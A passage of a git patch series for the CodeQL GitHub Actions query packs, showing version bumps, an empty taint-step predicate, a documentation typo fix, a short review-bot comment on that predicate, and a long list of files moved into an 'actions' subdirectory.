@@ --- library: false name: codeql/actions-queries -version: 0.2.2 +version: 0.3.0 groups: [actions, queries] suites: codeql-suites extractor: actions From 4a9355c5def2375ed7a91f324052c25876d1c682 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Fri, 13 Dec 2024 14:39:19 -0500 Subject: [PATCH 691/707] Add required signature predicate implementation --- .../actions/dataflow/internal/TaintTrackingPrivate.qll | 6 ++++++ 1 file changed, 6 insertions(+) 
diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll
index 2dde52035767..60d5a8d7baaa 100644
--- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll
@@ -32,3 +32,9 @@ predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nod
 */
 bindingset[node]
 predicate defaultImplicitTaintRead(DataFlow::Node node, DataFlow::ContentSet c) { none() }
+
+/**
+ * Holds if the additional step from `src` to `sink` should be considered in
+ * speculative taint flow exploration.
+ */
+predicate speculativeTaintStep(DataFlow::Node src, DataFlow::Node sink) { none() }
From 1370102d45c59c31d3d49c43ec3cea6ead7e13a8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Sat, 14 Dec 2024 10:10:50 +0100
Subject: [PATCH 692/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index dd83f7052196..22f90e2ca38e 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.2.2
+version: 0.2.3
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 90c64f0b7469..dcb4c76cbe25 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.2.2
+version: 0.2.3
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 2949098a27a1156c647fbe32a14b5c8f29aae24f Mon Sep 17 00:00:00 2001
From: Sam Partington
Date: Mon, 16 Dec 2024 15:40:38 +0000
Subject: [PATCH 693/707] Fix typo in UnversionedImmutableAction.md
---
 ql/src/Security/CWE-829/UnversionedImmutableAction.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
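Review bot: The new `speculativeTaintStep` predicate is an intentionally empty implementation (`none()`), but its doc comment only restates the shared signature contract, so a reader cannot tell whether Actions support is still pending or deliberately absent. I would extend the comment with a line such as `* No speculative steps are currently defined for the Actions language, so speculative exploration adds nothing beyond the default taint steps.` This matters because the predicate name suggests that extra flow is explored when a query opts into speculative mode, and with `none()` it is not, which a maintainer tuning query recall would otherwise have to discover by reading the body. The rest of the file lies outside the hunk.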
diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md index 33701ec27e67..cc371738d4aa 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.md +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md @@ -2,7 +2,7 @@ ## Description -Using an immutable action without indicating proper semantic version will result in the version being resolved to a tag that is mutable. This means the action code can between runs and without the user's knowledge. Using an immutable action with proper semantic versioning will resolve to the exact version +Using an immutable action without indicating proper semantic version will result in the version being resolved to a tag that is mutable. This means the action code can change between runs and without the user's knowledge. Using an immutable action with proper semantic versioning will resolve to the exact version of the action stored in the GitHub package registry. The action code will not change between runs. ## Recommendations From 237a6f11f9c0398197131534d534ccf8d9088e35 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 13:32:55 -0500 Subject: [PATCH 694/707] Bump version --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4bc32f934d9b..7fc284d6957a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: codeql/actions-all -version: 0.3.0 +version: 0.3.1 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 70f1e4945a1c..11b5260ce189 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: codeql/actions-queries -version: 0.3.0 +version: 0.3.1 groups: [actions, queries] suites: codeql-suites extractor: actions 
From ee7680df846a5dc1b550bd2d2b11fc27bbc44711 Mon Sep 17 00:00:00 2001 
From: Dave Bartolomeo Date: Wed, 18 Dec 2024 14:35:15 -0500 Subject: [PATCH 695/707] Move into `actions` subdirectory to prepare for migration to `github/codeql` --- .github/workflows/publish.yml | 33 ----------------- .github/workflows/test.yml | 37 ------------------- .gitignore | 7 ---- BUILD.bazel | 20 ---------- {extractor => actions/extractor}/BUILD.bazel | 0 .../extractor}/codeql-extractor.yml | 0 .../extractor}/tools/autobuild-impl.ps1 | 0 .../extractor}/tools/autobuild.cmd | 0 .../extractor}/tools/autobuild.sh | 0 {ql => actions/ql}/lib/actions.qll | 0 {ql => actions/ql}/lib/codeql-pack.lock.yml | 0 {ql => actions/ql}/lib/codeql/Locations.qll | 0 {ql => actions/ql}/lib/codeql/actions/Ast.qll | 0 .../ql}/lib/codeql/actions/Bash.qll | 0 {ql => actions/ql}/lib/codeql/actions/Cfg.qll | 0 .../ql}/lib/codeql/actions/Consistency.ql | 0 .../ql}/lib/codeql/actions/DataFlow.qll | 0 .../ql}/lib/codeql/actions/Helper.qll | 0 .../ql}/lib/codeql/actions/PowerShell.qll | 0 .../ql}/lib/codeql/actions/TaintTracking.qll | 0 ...efaultableCodeQLInitiatlizeActionQuery.qll | 0 .../lib/codeql/actions/ast/internal/Ast.qll | 0 .../lib/codeql/actions/ast/internal/Yaml.qll | 0 .../ql}/lib/codeql/actions/config/Config.qll | 0 .../actions/config/ConfigExtensions.qll | 0 .../actions/controlflow/BasicBlocks.qll | 0 .../actions/controlflow/internal/Cfg.qll | 0 .../codeql/actions/dataflow/ExternalFlow.qll | 0 .../codeql/actions/dataflow/FlowSources.qll | 0 .../lib/codeql/actions/dataflow/FlowSteps.qll | 0 .../codeql/actions/dataflow/TaintSteps.qll | 0 .../internal/DataFlowImplSpecific.qll | 0 .../dataflow/internal/DataFlowPrivate.qll | 0 .../dataflow/internal/DataFlowPublic.qll | 0 .../internal/ExternalFlowExtensions.qll | 0 .../internal/TaintTrackingImplSpecific.qll | 0 .../internal/TaintTrackingPrivate.qll | 0 .../actions/ideContextual/IDEContextual.qll | 0 .../codeql/actions/ideContextual/printAst.qll | 0 .../security/ArgumentInjectionQuery.qll | 0 
.../security/ArtifactPoisoningQuery.qll | 0 .../actions/security/CachePoisoningQuery.qll | 0 .../actions/security/CodeInjectionQuery.qll | 0 .../security/CommandInjectionQuery.qll | 0 .../codeql/actions/security/ControlChecks.qll | 0 .../security/EnvPathInjectionQuery.qll | 0 .../actions/security/EnvVarInjectionQuery.qll | 0 .../security/OutputClobberingQuery.qll | 0 .../actions/security/PoisonableSteps.qll | 0 .../actions/security/RequestForgeryQuery.qll | 0 .../security/SecretExfiltrationQuery.qll | 0 .../actions/security/SelfHostedQuery.qll | 0 .../security/UntrustedCheckoutQuery.qll | 0 .../UseOfKnownVulnerableActionQuery.qll | 0 .../UseOfUnversionedImmutableAction.qll | 0 .../ql}/lib/codeql/files/FileSystem.qll | 0 .../ext/config/argument_injection_sinks.yml | 0 .../ql}/lib/ext/config/context_event_map.yml | 0 .../config/externally_triggereable_events.yml | 0 .../ql}/lib/ext/config/immutable_actions.yml | 0 .../ql}/lib/ext/config/poisonable_steps.yml | 0 .../ext/config/untrusted_event_properties.yml | 0 .../lib/ext/config/untrusted_gh_command.yml | 0 .../lib/ext/config/untrusted_git_command.yml | 0 .../ql}/lib/ext/config/vulnerable_actions.yml | 0 .../lib/ext/config/workflow_runtime_data.yml | 0 ...ctions_actions-runner-controller.model.yml | 0 .../composite-actions/adap_flower.model.yml | 0 .../agoric_agoric-sdk.model.yml | 0 .../airbnb_lottie-ios.model.yml | 0 .../airbytehq_airbyte.model.yml | 0 .../amazon-ion_ion-java.model.yml | 0 .../composite-actions/anchore_grype.model.yml | 0 .../composite-actions/anchore_syft.model.yml | 0 .../angular_dev-infra.model.yml | 0 .../ansible_ansible-lint.model.yml | 0 .../composite-actions/ansible_awx.model.yml | 0 .../apache_arrow-datafusion.model.yml | 0 .../apache_arrow-rs.model.yml | 0 .../composite-actions/apache_arrow.model.yml | 0 .../apache_bookkeeper.model.yml | 0 .../composite-actions/apache_brpc.model.yml | 0 .../apache_camel-k.model.yml | 0 .../composite-actions/apache_camel.model.yml | 0 
.../composite-actions/apache_flink.model.yml | 0 .../apache_incubator-kie-tools.model.yml | 0 .../composite-actions/apache_nuttx.model.yml | 0 .../apache_opendal.model.yml | 0 .../composite-actions/apache_pekko.model.yml | 0 .../apache_pulsar-helm-chart.model.yml | 0 .../apache_superset.model.yml | 0 .../appflowy-io_appflowy.model.yml | 0 .../aptos-labs_aptos-core.model.yml | 0 .../archivesspace_archivesspace.model.yml | 0 .../armadaproject_armada.model.yml | 0 .../composite-actions/armbian_build.model.yml | 0 .../auth0_auth0-java.model.yml | 0 .../auth0_auth0.net.model.yml | 0 .../auth0_auth0.swift.model.yml | 0 .../autogluon_autogluon.model.yml | 0 .../composite-actions/avaiga_taipy.model.yml | 0 .../aws-amplify_amplify-cli.model.yml | 0 ...ertools_powertools-lambda-python.model.yml | 0 .../aws_amazon-vpc-cni-k8s.model.yml | 0 .../aws_karpenter-provider-aws.model.yml | 0 .../awslabs_amazon-eks-ami.model.yml | 0 .../awslabs_aws-lambda-rust-runtime.model.yml | 0 .../azerothcore_azerothcore-wotlk.model.yml | 0 .../azure_azure-datafactory.model.yml | 0 .../badges_shields.model.yml | 0 .../balena-io_etcher.model.yml | 0 .../balena-os_balena-engine.model.yml | 0 .../ben-manes_caffeine.model.yml | 0 .../composite-actions/bokeh_bokeh.model.yml | 0 .../botpress_botpress.model.yml | 0 ...intree_braintree-android-drop-in.model.yml | 0 .../braintree_braintree_android.model.yml | 0 .../broadinstitute_gatk.model.yml | 0 .../canonical_multipass.model.yml | 0 .../chia-network_actions.model.yml | 0 .../chia-network_chia-blockchain.model.yml | 0 .../chipsalliance_chisel.model.yml | 0 .../chocobozzz_peertube.model.yml | 0 .../cilium_cilium-cli.model.yml | 0 .../composite-actions/cilium_cilium.model.yml | 0 .../citusdata_citus.model.yml | 0 .../clerk_javascript.model.yml | 0 .../cloud-custodian_cloud-custodian.model.yml | 0 .../cloudflare_workers-sdk.model.yml | 0 ...cloudfoundry_cloud_controller_ng.model.yml | 0 .../composite-actions/coder_coder.model.yml | 0 
.../composite-actions/coil-kt_coil.model.yml | 0 .../commaai_openpilot.model.yml | 0 .../conan-io_conan-center-index.model.yml | 0 .../corretto_corretto-8.model.yml | 0 .../cosmos_cosmos-sdk.model.yml | 0 .../composite-actions/coturn_coturn.model.yml | 0 .../crunchydata_postgres-operator.model.yml | 0 .../composite-actions/cvc5_cvc5.model.yml | 0 .../composite-actions/d2l-ai_d2l-en.model.yml | 0 ...build-check-deploy-gradle-action.model.yml | 0 .../datadog_dd-trace-dotnet.model.yml | 0 .../datadog_dd-trace-go.model.yml | 0 .../datadog_dd-trace-js.model.yml | 0 .../datafuselabs_databend.model.yml | 0 .../davatorium_rofi.model.yml | 0 .../debezium_debezium.model.yml | 0 .../defenseunicorns_zarf.model.yml | 0 ...lifiees_demarches-simplifiees.fr.model.yml | 0 ...of-veterans-affairs_vets-website.model.yml | 0 .../devexpress_devextreme.model.yml | 0 .../diggerhq_digger.model.yml | 0 .../diku-dk_futhark.model.yml | 0 .../discourse_.github.model.yml | 0 .../dnsjava_dnsjava.model.yml | 0 .../dotintent_react-native-ble-plx.model.yml | 0 .../dotnet_docs-tools.model.yml | 0 .../dotnet_dotnet-monitor.model.yml | 0 .../dragonflydb_dragonfly.model.yml | 0 .../drawpile_drawpile.model.yml | 0 .../eksctl-io_eksctl.model.yml | 0 .../elastic_apm-agent-dotnet.model.yml | 0 .../elastic_apm-agent-java.model.yml | 0 .../elastic_apm-server.model copy.yml | 0 .../elementor_elementor.model.yml | 0 .../composite-actions/emberjs_data.model.yml | 0 .../composite-actions/emqx_emqx.model.yml | 0 .../eonasdan_tempus-dominus.model.yml | 0 .../composite-actions/erlang_otp.model.yml | 0 .../esphome_esphome.model.yml | 0 .../composite-actions/expensify_app.model.yml | 0 .../composite-actions/expo_expo.model.yml | 0 .../expo_vscode-expo.model.yml | 0 ...xternal-secrets_external-secrets.model.yml | 0 .../facebook_buck2.model.yml | 0 .../composite-actions/facebook_flow.model.yml | 0 .../composite-actions/facebook_yoga.model.yml | 0 .../facebookresearch_xformers.model.yml | 0 
.../fastly_compute-actions.model.yml | 0 .../composite-actions/felangel_bloc.model.yml | 0 .../firebase_firebase-ios-sdk.model.yml | 0 .../flagsmith_flagsmith.model.yml | 0 .../flaxengine_flaxengine.model.yml | 0 ...pperdevices_flipperzero-firmware.model.yml | 0 .../composite-actions/fluxcd_flux2.model.yml | 0 .../forcedotcom_salesforcedx-vscode.model.yml | 0 .../fossasia_visdom.model.yml | 0 .../freckle_stack-action.model.yml | 0 .../freeradius_freeradius-server.model.yml | 0 .../composite-actions/gaphor_gaphor.model.yml | 0 .../getsentry_action-release.model.yml | 0 .../github_codeql-action.model.yml | 0 .../composite-actions/github_ruby.model.yml | 0 .../gittools_gitversion.model.yml | 0 .../go-spatial_tegola.model.yml | 0 .../goauthentik_authentik.model.yml | 0 .../godotengine_godot.model.yml | 0 .../composite-actions/google_dagger.model.yml | 0 .../googleapis_java-cloud-bom.model.yml | 0 .../googleapis_sdk-platform-java.model.yml | 0 ...ecloudplatform_dataflowtemplates.model.yml | 0 ...ooglecloudplatform_magic-modules.model.yml | 0 .../gravitational_teleport.model.yml | 0 .../grote_transportr.model.yml | 0 .../hashicorp_nomad.model.yml | 0 .../hashicorp_terraform.model.yml | 0 .../hashicorp_vault.model.yml | 0 .../home-assistant_android.model.yml | 0 .../homebrew_actions.model.yml | 0 ...erledger_aries-cloudagent-python.model.yml | 0 .../hyperledger_fabric-samples.model.yml | 0 .../igniterealtime_openfire.model.yml | 0 .../infracost_actions.model.yml | 0 ...nspektor-gadget_inspektor-gadget.model.yml | 0 .../intel-analytics_ipex-llm.model.yml | 0 .../ionic-team_ionic-framework.model.yml | 0 .../ionic-team_ionicons.model.yml | 0 .../ionic-team_stencil.model.yml | 0 .../composite-actions/ipfs_aegir.model.yml | 0 .../jetbrains_jetbrainsruntime.model.yml | 0 .../jhipster_generator-jhipster.model.yml | 0 .../jsocol_django-ratelimit.model.yml | 0 .../juicedata_juicefs.model.yml | 0 .../jupyter_docker-stacks.model.yml | 0 .../keycloak_keycloak.model.yml | 0 
.../composite-actions/kserve_kserve.model.yml | 0 .../kubeflow_katib.model.yml | 0 .../kubeflow_training-operator.model.yml | 0 .../kubernetes-sigs_karpenter.model.yml | 0 .../kubernetes-sigs_kwok.model.yml | 0 .../kubescape_kubescape.model.yml | 0 .../kubeshop_botkube.model.yml | 0 .../kyverno_kyverno.model.yml | 0 .../composite-actions/lancedb_lance.model.yml | 0 .../launchdarkly_ios-client-sdk.model.yml | 0 .../layer5labs_meshmap-snapshot.model.yml | 0 .../ldc-developers_ldc.model.yml | 0 .../ledgerhq_ledger-live.model.yml | 0 .../composite-actions/lerna_lerna.model.yml | 0 .../composite-actions/lf-edge_eve.model.yml | 0 .../libgit2_libgit2.model.yml | 0 .../lightning-ai_pytorch-lightning.model.yml | 0 .../lightning-ai_torchmetrics.model.yml | 0 .../linkerd_linkerd2.model.yml | 0 .../logseq_publish-spa.model.yml | 0 .../macvim-dev_macvim.model.yml | 0 .../mamba-org_mamba.model.yml | 0 .../maplibre_maplibre-native.model.yml | 0 .../mastodon_mastodon.model.yml | 0 .../mavlink_qgroundcontrol.model.yml | 0 .../mdanalysis_mdanalysis.model.yml | 0 .../medic_cht-core.model.yml | 0 .../medusajs_medusa.model.yml | 0 .../metabase_metabase.model.yml | 0 ...etamask_action-create-release-pr.model.yml | 0 .../metamask_action-npm-publish.model.yml | 0 .../microsoft_fluentui.model.yml | 0 .../microsoft_playwright.model.yml | 0 .../composite-actions/microsoft_wsl.model.yml | 0 .../milvus-io_milvus.model.yml | 0 .../composite-actions/mlflow_mlflow.model.yml | 0 .../modin-project_modin.model.yml | 0 .../mozilla_addons-server.model.yml | 0 .../mozilla_bedrock.model.yml | 0 .../mozilla_sccache.model.yml | 0 .../msys2_setup-msys2.model.yml | 0 .../mumble-voip_mumble.model.yml | 0 .../composite-actions/nasa_fprime.model.yml | 0 .../nats-io_nats-server.model.yml | 0 ..._optic-release-automation-action.model.yml | 0 .../composite-actions/nektos_act.model.yml | 0 ...4j-contrib_neo4j-apoc-procedures.model.yml | 0 .../neondatabase_neon.model.yml | 0 
.../composite-actions/neovim_neovim.model.yml | 0 .../composite-actions/nhost_nhost.model.yml | 0 .../nix-community_nixos-wsl.model.yml | 0 .../composite-actions/novuhq_novu.model.yml | 0 .../composite-actions/nymtech_nym.model.yml | 0 .../obsproject_obs-studio.model.yml | 0 .../composite-actions/ocaml_dune.model.yml | 0 .../oneflow-inc_oneflow.model.yml | 0 ...metry_opentelemetry-ruby-contrib.model.yml | 0 ...pen-telemetry_opentelemetry-ruby.model.yml | 0 .../open-watcom_open-watcom-v2.model.yml | 0 .../openapitools_openapi-generator.model.yml | 0 .../composite-actions/openjdk_jdk.model.yml | 0 ...pensearch-project_opensearch-net.model.yml | 0 .../opensearch-project_security.model.yml | 0 .../opentrons_opentrons.model.yml | 0 .../openvinotoolkit_openvino.model.yml | 0 ...enzeppelin-contracts-upgradeable.model.yml | 0 ...nzeppelin_openzeppelin-contracts.model.yml | 0 .../composite-actions/oppia_oppia.model.yml | 0 .../composite-actions/oracle_graal.model.yml | 0 .../oracle_truffleruby.model.yml | 0 .../orhun_git-cliff.model.yml | 0 .../composite-actions/oven-sh_bun.model.yml | 0 .../owntracks_android.model.yml | 0 .../pandas-dev_pandas.model.yml | 0 .../pardeike_harmony.model.yml | 0 .../pennylaneai_pennylane.model.yml | 0 .../phalcon_cphalcon.model.yml | 0 .../philosowaffle_peloton-to-garmin.model.yml | 0 .../composite-actions/php_php-src.model.yml | 0 .../phpdocumentor_phpdocumentor.model.yml | 0 ...necone-io_pinecone-python-client.model.yml | 0 .../composite-actions/pixijs_pixijs.model.yml | 0 .../posthog_posthog.model.yml | 0 .../composite-actions/primer_react.model.yml | 0 .../project-chip_connectedhomeip.model.yml | 0 .../projectnessie_nessie.model.yml | 0 .../composite-actions/psf_black.model.yml | 0 .../pyca_cryptography.model.yml | 0 .../pyg-team_pytorch_geometric.model.yml | 0 .../python-poetry_poetry.model.yml | 0 .../composite-actions/python_mypy.model.yml | 0 .../quarto-dev_quarto-cli.model.yml | 0 .../composite-actions/quay_clair.model.yml | 0 
.../quickwit-oss_quickwit.model.yml | 0 .../composite-actions/r-lib_actions.model.yml | 0 .../randombit_botan.model.yml | 0 .../raspberrypi_documentation.model.yml | 0 .../ray-project_kuberay.model.yml | 0 .../readthedocs_actions.model.yml | 0 .../reflex-dev_reflex.model.yml | 0 .../renovatebot_renovate.model.yml | 0 .../rethinkdb_rethinkdb.model.yml | 0 .../composite-actions/risc0_risc0.model.yml | 0 .../rocketchat_rocket.chat.model.yml | 0 .../composite-actions/rook_rook.model.yml | 0 .../composite-actions/roots_trellis.model.yml | 0 .../composite-actions/ruby_debug.model.yml | 0 .../composite-actions/ruby_ruby.model.yml | 0 .../composite-actions/rusefi_rusefi.model.yml | 0 .../saltstack_salt.model.yml | 0 .../composite-actions/saltstack_salt.yml | 0 .../sap_sapmachine.model.yml | 0 .../scala-native_scala-native.model.yml | 0 .../composite-actions/scitools_iris.model.yml | 0 .../scylladb_scylla-operator.model.yml | 0 .../shader-slang_slang.model.yml | 0 .../shaka-project_shaka-player.model.yml | 0 ...ode_react-webpack-rails-tutorial.model.yml | 0 .../simple-icons_simple-icons.model.yml | 0 .../slint-ui_slint.model.yml | 0 .../solidusio_solidus.model.yml | 0 .../composite-actions/solo-io_gloo.model.yml | 0 .../composite-actions/sonarr_sonarr.model.yml | 0 .../sonic-pi-net_sonic-pi.model.yml | 0 .../spacedriveapp_spacedrive.model.yml | 0 .../spockframework_spock.model.yml | 0 .../spring-io_initializr.model.yml | 0 .../spring-io_start.spring.io.model.yml | 0 .../spring-projects_spring-boot.model.yml | 0 ...spring-projects_spring-framework.model.yml | 0 .../spring-projects_spring-graphql.model.yml | 0 .../square_workflow-kotlin.model.yml | 0 .../stefanprodan_podinfo.model.yml | 0 .../composite-actions/stellar_go.model.yml | 0 .../streetsidesoftware_cspell.model.yml | 0 .../subquery_subql.model.yml | 0 .../swagger-api_swagger-codegen.model.yml | 0 .../swagger-api_swagger-parser.model.yml | 0 .../tarantool_tarantool.model.yml | 0 
.../telepresenceio_telepresence.model.yml | 0 .../tensorflow_datasets.model.yml | 0 .../texstudio-org_texstudio.model.yml | 0 .../toeverything_affine.model.yml | 0 .../treeverse_lakefs.model.yml | 0 .../trezor_trezor-firmware.model.yml | 0 .../tribler_tribler.model.yml | 0 .../trunk-io_trunk-action.model.yml | 0 .../composite-actions/unidata_metpy.model.yml | 0 .../unstructured-io_unstructured.model.yml | 0 .../composite-actions/vercel_turbo.model.yml | 0 .../vesoft-inc_nebula.model.yml | 0 .../composite-actions/vkcom_vkui.model.yml | 0 .../vuetifyjs_vuetify.model.yml | 0 .../wagoodman_dive.model.yml | 0 ...lletconnect_walletconnectswiftv2.model.yml | 0 .../composite-actions/wazuh_wazuh.model.yml | 0 .../web-infra-dev_rspack.model.yml | 0 .../webassembly_wabt.model.yml | 0 .../composite-actions/wntrblm_nox.model.yml | 0 .../composite-actions/xrplf_rippled.model.yml | 0 .../composite-actions/zcash_zcash.model.yml | 0 .../zenml-io_zenml.model.yml | 0 .../composite-actions/zeroc-ice_ice.model.yml | 0 .../0xpolygon_polygon-edge.model.yml | 0 .../reusable-workflows/8vim_8vim.model.yml | 0 .../actions_reusable-workflows.model.yml | 0 .../reusable-workflows/adap_flower.model.yml | 0 .../aio-libs_multidict.model.yml | 0 .../aio-libs_yarl.model.yml | 0 .../airbytehq_airbyte.model.yml | 0 .../alphagov_collections.model.yml | 0 .../alphagov_frontend.model.yml | 0 .../alphagov_publishing-api.model.yml | 0 .../reusable-workflows/apache_druid.model.yml | 0 .../reusable-workflows/apache_flink.model.yml | 0 .../reusable-workflows/apache_spark.model.yml | 0 .../argilla-io_argilla.model.yml | 0 .../argoproj_argo-cd.model.yml | 0 .../argoproj_argo-rollouts.model.yml | 0 .../aws-amplify_amplify-ui.model.yml | 0 .../reusable-workflows/azure_apiops.model.yml | 0 .../azure_mlops-templates.model.yml | 0 .../bbq-beets_avocaddo-cmw.model.yml | 0 .../bbq-beets_mobile-ci-cd.model.yml | 0 .../bbq-beets_yujincat-action.model.yml | 0 .../bdunderscore_modular-avatar.model.yml | 0 
.../benc-uk_workflow-dispatch.model.yml | 0 .../bridgecrewio_checkov.model.yml | 0 .../bugsnag_bugsnag-ruby.model.yml | 0 ...ecodealliance_wasm-micro-runtime.model.yml | 0 .../celo-org_celo-blockchain.model.yml | 0 .../cemu-project_cemu.model.yml | 0 .../cesiumgs_cesium-unreal.model.yml | 0 .../reusable-workflows/cgal_cgal.model.yml | 0 .../checkstyle_checkstyle.model.yml | 0 .../chia-network_actions.model.yml | 0 .../chipsalliance_chisel.model.yml | 0 .../clickhouse_clickhouse.model.yml | 0 .../cloudfoundry_cli.model.yml | 0 ...thub-action-matrix-outputs-write.model.yml | 0 .../cocotb_cocotb.model.yml | 0 .../codeigniter4_codeigniter4.model.yml | 0 .../com-lihaoyi_mill.model.yml | 0 .../cosmos_ibc-go.model.yml | 0 .../crowdsecurity_crowdsec.model.yml | 0 .../cryptomator_cryptomator.model.yml | 0 .../daeuniverse_dae.model.yml | 0 .../dafny-lang_dafny.model.yml | 0 .../dagger_dagger.model.yml | 0 .../dash-industry-forum_dash.js.model.yml | 0 .../datadog_dd-trace-go.model.yml | 0 .../datadog_dd-trace-py.model.yml | 0 .../datafuselabs_databend.model.yml | 0 .../dbt-labs_dbt-bigquery.model.yml | 0 .../dbt-labs_dbt-core.model.yml | 0 .../dbt-labs_dbt-snowflake.model.yml | 0 .../decidim_decidim.model.yml | 0 .../defectdojo_django-defectdojo.model.yml | 0 ...dependencytrack_dependency-track.model.yml | 0 .../devexpress_testcafe.model.yml | 0 .../dfhack_dfhack.model.yml | 0 .../docker_build-push-action.model.yml | 0 .../dragonwell-project_dragonwell11.model.yml | 0 .../earthly_earthly.model.yml | 0 .../eclipse-vertx_vert.x.model.yml | 0 .../eclipse-vertx_vertx-sql-client.model.yml | 0 .../elastic_elasticsearch-net.model.yml | 0 .../element-hq_element-desktop.model.yml | 0 .../envoyproxy_envoy.model.yml | 0 .../etcd-io_bbolt.model.yml | 0 .../reusable-workflows/etcd-io_etcd.model.yml | 0 .../eventstore_eventstore.model.yml | 0 .../expensify_app.model.yml | 0 ...xternal-secrets_external-secrets.model.yml | 0 .../facebook_create-react-app.model.yml | 0 
.../facebookresearch_xformers.model.yml | 0 .../falcosecurity_falco.model.yml | 0 .../fastify_fastify.model.yml | 0 .../ferretdb_ferretdb.model.yml | 0 .../filecoin-project_venus.model.yml | 0 .../firebase_firebase-unity-sdk.model.yml | 0 .../flarum_framework.model.yml | 0 .../fluent_fluent-bit.model.yml | 0 .../flux-iac_tofu-controller.model.yml | 0 .../flyteorg_flyte.model.yml | 0 .../foundatiofx_foundatio.model.yml | 0 .../freecad_freecad.model.yml | 0 .../getpelican_pelican.model.yml | 0 .../getporter_porter.model.yml | 0 .../getsentry_sentry-dart.model.yml | 0 .../getsentry_sentry-unity.model.yml | 0 .../gitpod-io_gitpod.model.yml | 0 .../gittools_gitversion.model.yml | 0 ...ooglecloudplatform_magic-modules.model.yml | 0 ...loudplatform_nodejs-docs-samples.model.yml | 0 .../gravitational_teleport.model.yml | 0 .../gravitl_netmaker.model.yml | 0 .../reusable-workflows/h2oai_wave.model.yml | 0 .../hadashia_vcontainer.model.yml | 0 .../hashgraph_hedera-services.model.yml | 0 .../hashicorp_boundary.model.yml | 0 .../hashicorp_consul.model.yml | 0 .../hashicorp_terraform-cdk.model.yml | 0 ...hashicorp_terraform-provider-tfe.model.yml | 0 .../hashicorp_terraform.model.yml | 0 .../hashicorp_vault.model.yml | 0 .../reusable-workflows/heroku_cli.model.yml | 0 .../hitobito_hitobito.model.yml | 0 .../home-assistant_operating-system.model.yml | 0 .../homuler_mediapipeunityplugin.model.yml | 0 .../huggingface_doc-builder.model.yml | 0 .../huggingface_transformers.model.yml | 0 .../hyperion-project_hyperion.ng.model.yml | 0 .../reusable-workflows/ibm_sarama.model.yml | 0 ...nloader_icloud_photos_downloader.model.yml | 0 .../immich-app_immich.model.yml | 0 .../reusable-workflows/inria_spoon.model.yml | 0 ...el-device-plugins-for-kubernetes.model.yml | 0 .../inverse-inc_packetfence.model.yml | 0 .../reusable-workflows/ispc_ispc.model.yml | 0 ..._intellij-platform-gradle-plugin.model.yml | 0 .../jupyter_docker-stacks.model.yml | 0 .../kairos-io_kairos.model.yml | 0 
.../kanidm_kanidm.model.yml | 0 .../kata-containers_kata-containers.model.yml | 0 .../reusable-workflows/kiali_kiali.model.yml | 0 .../kotest_kotest.model.yml | 0 .../kubernetes_ingress-nginx.model.yml | 0 .../kubescape_kubescape.model.yml | 0 .../kubeshop_botkube.model.yml | 0 .../reusable-workflows/kumahq_kuma.model.yml | 0 .../labring_sealos.model.yml | 0 .../laion-ai_open-assistant.model.yml | 0 .../learningequality_kolibri.model.yml | 0 .../lensesio_stream-reactor.model.yml | 0 .../leptos-rs_leptos.model.yml | 0 .../lightning-ai_pytorch-lightning.model.yml | 0 .../liquibase_liquibase.model.yml | 0 .../litestar-org_litestar.model.yml | 0 .../reusable-workflows/llvm_circt.model.yml | 0 .../lnbits_lnbits.model.yml | 0 .../lutris_lutris.model.yml | 0 .../reusable-workflows/mailu_mailu.model.yml | 0 .../mamba-org_mamba.model.yml | 0 ...anticoresoftware_manticoresearch.model.yml | 0 .../marcelotduarte_cx_freeze.model.yml | 0 ...xaml_materialdesigninxamltoolkit.model.yml | 0 .../matter-labs_zksync-era.model.yml | 0 .../mattermost_desktop.model.yml | 0 .../mattermost_mattermost.model.yml | 0 .../mealie-recipes_mealie.model.yml | 0 .../meshery_meshery.model.yml | 0 .../meshtastic_firmware.model.yml | 0 .../microcks_microcks.model.yml | 0 ...crosoft_applicationinsights-java.model.yml | 0 .../microsoft_chat-copilot.model.yml | 0 .../microsoft_msquic.model.yml | 0 .../microsoft_oryx.model.yml | 0 .../microsoft_pr-metrics.model.yml | 0 ...oft_react-native-windows-samples.model.yml | 0 .../microsoft_vscode-cpptools.model.yml | 0 .../moby_buildkit.model.yml | 0 .../reusable-workflows/moby_moby.model.yml | 0 .../mosaicml_composer.model.yml | 0 .../msys2_setup-msys2.model.yml | 0 .../mudler_localai.model.yml | 0 .../mustardchef_wsabuilds.model.yml | 0 